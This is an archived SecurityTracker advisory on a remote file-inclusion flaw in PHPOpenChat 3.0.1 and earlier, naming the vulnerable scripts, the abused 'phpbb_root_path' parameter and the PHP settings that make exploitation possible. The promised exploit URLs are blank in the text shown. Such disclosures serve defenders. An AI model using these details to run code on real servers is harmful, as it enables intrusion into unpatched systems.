Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Instant Messaging/IRC/Chat)  >   PHPOpenChat Vendors:
PHPOpenChat Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1013434
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 16 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.0.1 and prior versions
Description:   Mafia_Boy from Albania Security Clan reported an include file vulnerability in PHPOpenChat. A remote user can execute arbitrary commands on the target system.

A flaw resides in '/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php', where the '' file is included relative to the 'phpbb_root_path' parameter value. A remote user can supply a specially crafted URL to cause the target server to include and execute arbitrary PHP code from a remote system. The PHP code, including operating system commands, will execute with the privileges of the target web service.

A demonstration exploit URL is provided:


Similar flaws exist in '/phpopenchat/contrib/phpbb/poc.php', '/phpopenchat/contrib/phpnuke/ENGLISH_poc.php', '/phpopenchat/contrib/phpnuke/poc.php', and '/phpopenchat/contrib/yabbse/poc.php'.

Some demonstration exploit URLs are provided:


If the 'register_globals' and 'allow_url_fopen' options are set to 'on' in the 'php.ini' configuration file, then a remote user can exploit these vulnerabilities.

The vendor has been notified.

The original advisory is availble at:

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  Multiples vulnerability in PHPOpenChat (File Inclusion Vulnerability) | -j #ASC

Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC